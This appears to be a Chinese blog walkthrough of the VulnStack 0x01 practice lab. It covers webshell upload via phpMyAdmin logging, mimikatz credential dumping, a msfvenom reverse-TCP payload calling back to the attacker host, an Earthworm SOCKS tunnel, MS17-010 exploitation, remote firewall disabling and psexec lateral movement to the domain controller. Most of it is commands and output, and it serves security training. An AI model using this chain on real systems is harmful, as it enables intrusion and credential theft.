VulnStack0x01

VulnStack 0x01

学习于 :

黑白天-jen

从外网到域控

下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

基本信息

name host password 说明
win7 192.168.52.143 | 192.168.21.145 xzasLXR1 WEB服务器
win2k3 192.168.52.141 xzasLXR1 域成员
win2008 192.168.52.138 xzas@157 域控服务器
kali 192.168.21.129 attack

win 7

webshell

result of dirsearch

/yxcms

/phpmyAdmin

/phpMyAdmin

教训:好字典的重要性,要死就是没找到合适的字典,算了 直接将yxcms加到字典里吧www

yxcms

  • 访问 yxcms

在右下角form中有提示

/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。

  • 访问后台

http://192.168.21.145/yxcms/index.php?r=admin

username password
admin 123456
  • webshell

利用修改页面功能写webshell

image-20200509155913084

还是喜欢用AntSword

phpmyadmin

访问 phpmyAdmin

使用默认密码

username password
root root

getshell的常见方式:
1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

  • 查看secure_file_priv

image-20200509181258991

注意secure_file_priv为只读

  • 采用日志的方法

    • 查看权限

    show global variables like "%genera%";

    varname value
    Variable_name Value
    general_log OFF
    general_log_file C:\phpStudy\MySQL\data\stu1.log
    • 修改权限与Log文件地址
    set global general_log='ON';
    set  global general_log_file='C:/phpStudy/WWW/fe1w0.php';
    select '';

image-20200509183333675

image-20200509183716469

信息收集

发现Antwork 在返回信息时,有时会BUG

基本点

本机信息收集

命令名 说明
net view 获取当前组的计算机名,查看同一域/工作组的计算机列表
net user 用户信息的查询
query user || qwinsta 查询当前在线用户
net localgroup administrators 查询本地管理员组信息,通常那个域内机器会包含一些域内的信息
ipconfig /all 查询网络配置信息,判断是否有域的话可以根据DNS的后缀
nslookup 通过反向解析查询命令nslookup来解析域名的IP 地址。使用解析出来的IP地址进 行对比,判断域控制器和DNS 服务器是否在同一台服务器上 dig
systeminfo 获取系统信息
tasklist 查询进程信息,用来查看需要是否存在杀软之类的
netstat -ano 查看端口信息

还有其他常用命令

详情:

C:\tmp> net localgroup administrators
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
Administrator
GOD\Domain Admins
liukaifeng01
命令成功完成。
C:\tmp> systeminfo
主机名:           STU1
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          成员工作站
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户

域信息收集

  • whoami /all 查询域SID

  • net user test1 /domain 查询当前指定账户的详细信息

  • net config workstation 查询当前登录域及登录用户信息

  • net time /domain

一般会有三种情况:

存在域,但当前用户不是域用户,提示说明权限不够

存在域,并且当前用户是域用户

当前网络环境为工作组,不存在域

  • net group "Domain Controllers" /domain 查找域控

也可以采用 WMIC脚本来收集

http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

探测域内其他主机

这里使用arp扫描 和nbtscan来收集域内信息

 arp-scan_64.exe -t 192.168.52.1/20 >1.txt 

Reply that 00:0C:29:86:6F:BA is 192.168.52.138 in 15.289000
Reply that 00:0C:29:2A:99:BC is 192.168.52.141 in 16.001900
Reply that 00:0C:29:A3:B3:2A is 192.168.52.143 in 0.040600
Reply that 00:0C:29:A3:B3:2A is 192.168.52.255 in 0.048100

C:\tmp> nbtscan-1.0.35.exe 192.168.52.0/24 >z.txt
*timeout (normal end of scan)
192.168.52.138  GOD\OWA                         SHARING DC
192.168.52.141  GOD\ROOT-TVI862UBEH             SHARING
192.168.52.143  GOD\STU1                        SHARING
ip 说明
192.168.52.138 DC
192.168.52.141 域内其他机器
192.168.52.143 当前机器win7

本机密码

上传mimikatz

注意此处最好先用nc反弹cmd.exe,在ANTSword有可能看不到回显

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log

Authentication Id : 0 ; 2568929 (00000000:002732e1)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2020/5/9 15:01:10
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary

  • Username : Administrator
    • Domain : GOD
      • LM : 1121a434316e2b1ec2265b23734e0dac
      • NTLM : b8529ce2d4fa8ba1adc67295abefe12e
      • SHA1 : 11540fad9cb5ed35fe7f599aef2b0fa58c0fdec4
        tspkg :
      • Username : Administrator
      • Domain : GOD
      • Password : xzasLXR1

关闭防火墙

进入内网

制作木马后门

#kali
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.21.129 lport=23333 -f exe > /root/Desktop/reverse_tcp.exe

将木马上传到win7并执行。

image-20200509214503044

kali msf监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.21.129
LHOST => 192.168.21.129
msf5 exploit(multi/handler) > set LPORT 23334
LPORT => 23334
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.21.129:23334
[*] Sending stage (206403 bytes) to 192.168.21.145
[*] Meterpreter session 1 opened (192.168.21.129:23334 -> 192.168.21.145:7746) at 2020-05-09 10:02:12 -0400

meterpreter > pwd
C:\tmp
meterpre

代理

但为了kali 能直接访问内网,我们还需开启代理

祭出 橙色神器 Earthworm

https://bbs.ichunqiu.com/thread-36219-1-2.html

反弹 SOCKS v5 服务器

同样需要先上传ew_for_Win.exe到边界机

  • kali

修改proxychains文件

文件地址 /etc/proxychains.conf

修改为

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
#socks5 192.168.21.144 1080
socks5 127.0.0.1 1080

监听1080端口

./ew_for_linux64 -s rcsocks -l 1080 -e 8888
  • win7
ew_for_Win.exe -s rssocks -d 192.168.21.129 -e 8888

代理msf

image-20200509222637105

扫描端口

msf5 > use scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.52.138 192.168.52.141
RHOSTS => 192.168.52.138 192.168.52.141
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 3389,139,445,80,8080,21
PORTS => 3389,139,445,80,8080,21
msf5 auxiliary(scanner/portscan/tcp) > set threads 65
threads => 65
msf5 auxiliary(scanner/portscan/tcp) > run
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:21-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:139-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:80-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:445-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:8080-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:139-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:21-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:3389-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:8080-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:445-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:3389-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:80-<><>-OK

[+] 192.168.52.138:       - 192.168.52.138:139 - TCP OPEN
<><>-OK
[+] 192.168.52.138:       - 192.168.52.138:80 - TCP OPEN
<><>-OK
[+] 192.168.52.138:       - 192.168.52.138:445 - TCP OPEN
<><>-OK
[+] 192.168.52.141:       - 192.168.52.141:139 - TCP OPEN
<><>-OK
[+] 192.168.52.141:       - 192.168.52.141:21 - TCP OPEN
<><>-OK
[+] 192.168.52.141:       - 192.168.52.141:445 - TCP OPEN
<--timeout
<--timeout
<--timeout
<--timeout
<--timeout
<--timeout
[*] Scanned 1 of 2 hosts (50% complete)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed

MS17-010

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

scan

msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.52.141 192.168.52.138
RHOSTS => 192.168.52.141 192.168.52.138
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:135-<><>-OK

[+] 192.168.52.141:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 x86 (32-bit)
[*] Scanned 1 of 2 hosts (50% complete)
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:135-<><>-OK
[+] 192.168.52.138:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

exploit – Error

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

但失败

Auxiliary module – 关闭防火墙

msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/admin/smb/ms17_010_command
msf5 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 auxiliary(admin/smb/ms17_010_command) > set COMMAND netsh advfirewall set allprofiles state off
COMMAND => netsh advfirewall set allprofiles state off
msf5 auxiliary(admin/smb/ms17_010_command) > run

之后再次exploit

image-20200510004932226

Error还是有可能会报的,而且贼不稳

可以使用进程迁移 run post/windows/manage/migrate,但效果平平,还是任意死,感觉是代理的锅。

mimikatz

之后可以利用mimikatz来获取密码

r8要先登录,能正常使用

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;45394   NTLM
0;995     Negotiate  NT AUTHORITY  IUSR
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  GOD           OWA$           23 25 9c f9 6d 81 30 d0 bf a5 99 d8 50 78 6d 69 c7 ba 82 c0 5a f5 1d 44 ee ec 10 e3 c9 14 87 0f 75 28 ea 63 6a 61 1f 81 35 28 fa 93 cf 7d ea 98 7c d9 09 1b e4 86 96 82 a5 2a fc 52 c1 33 ba 19 54 88 0f 5d f2 30 ac 26 97 55 33 f8 4f 61 58 52 c3 b2 3f 3b 8d b2 4d 19 3d 76 d9 ba a5 a8 26 94 96 a0 dc 86 37 30 a5 bf 6a 2a 92 2c 1e 08 a5 4b 9a 4d 9e d7 85 1a 36 07 55 d8 34 5b 47 58 21 43 34 17 d2 0a 74 9a 52 a4 9f 76 9e 25 0a f0 df ea 9e 34 7d c1 87 e2 9a 10 8e 06 cf a8 be 91 b0 35 09 bb cb db 51 6d 8d 0d ce 5b d5 40 9a 08 30 d5 29 d5 4f b7 c7 9b ab 4c 06 59 d9 0b 2f d7 fa 2d 07 4f 7d 62 a1 c9 97 74 61 bb c5 e3 a1 95 19 6e a9 8a 4d a1 3a 1a fa 09 cb 57 3e 0b 4e b1 fc eb 22 d0 07 05 97 a2 a2 aa d9 69 67 70 53 0e 37 92
0;999     Negotiate  GOD           OWA$           23 25 9c f9 6d 81 30 d0 bf a5 99 d8 50 78 6d 69 c7 ba 82 c0 5a f5 1d 44 ee ec 10 e3 c9 14 87 0f 75 28 ea 63 6a 61 1f 81 35 28 fa 93 cf 7d ea 98 7c d9 09 1b e4 86 96 82 a5 2a fc 52 c1 33 ba 19 54 88 0f 5d f2 30 ac 26 97 55 33 f8 4f 61 58 52 c3 b2 3f 3b 8d b2 4d 19 3d 76 d9 ba a5 a8 26 94 96 a0 dc 86 37 30 a5 bf 6a 2a 92 2c 1e 08 a5 4b 9a 4d 9e d7 85 1a 36 07 55 d8 34 5b 47 58 21 43 34 17 d2 0a 74 9a 52 a4 9f 76 9e 25 0a f0 df ea 9e 34 7d c1 87 e2 9a 10 8e 06 cf a8 be 91 b0 35 09 bb cb db 51 6d 8d 0d ce 5b d5 40 9a 08 30 d5 29 d5 4f b7 c7 9b ab 4c 06 59 d9 0b 2f d7 fa 2d 07 4f 7d 62 a1 c9 97 74 61 bb c5 e3 a1 95 19 6e a9 8a 4d a1 3a 1a fa 09 cb 57 3e 0b 4e b1 fc eb 22 d0 07 05 97 a2 a2 aa d9 69 67 70 53 0e 37 92
0;329096  Kerberos   GOD           liukaifeng01   xzas@157
0;329127  Negotiate  GOD           liukaifeng01   xzas@157

exploit – success

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 exploit(windows/smb/psexec) > set SMBDomain god.org
SMBDomain => god.org
msf5 exploit(windows/smb/psexec) > set SMBUSER liukaifeng01
SMBUSER => liukaifeng01
msf5 exploit(windows/smb/psexec) > set SMBPASS xzas@157
SMBPASS => xzas@157
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > set LPORT 8553
LPORT => 8553

image-20200510013022559

比之前稳定多了

CobaltStrike

官网

link : https://www.cobaltstrike.com

B站 上有前辈翻译视频

link : https://www.bilibili.com/video/BV1S7411k7pU/

u1s1 B站上只要关注合天他们,基本上B站关于信安的视频和up ,你都会知道

其他学习link:

https://www.jianshu.com/p/8d823adbc6b5

待尝试cs4.0

后记

啊啊啊 好多还不会,这个实践完

好好学习《内网安全攻防》

评论

  1. fe1w0 博主
    7月前
    2020-5-10 3:20:28

    难顶,比赛结束再录视频吧

  2. fe1w0 博主
    7月前
    2020-5-10 3:20:28

    难顶,比赛结束再录视频吧

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇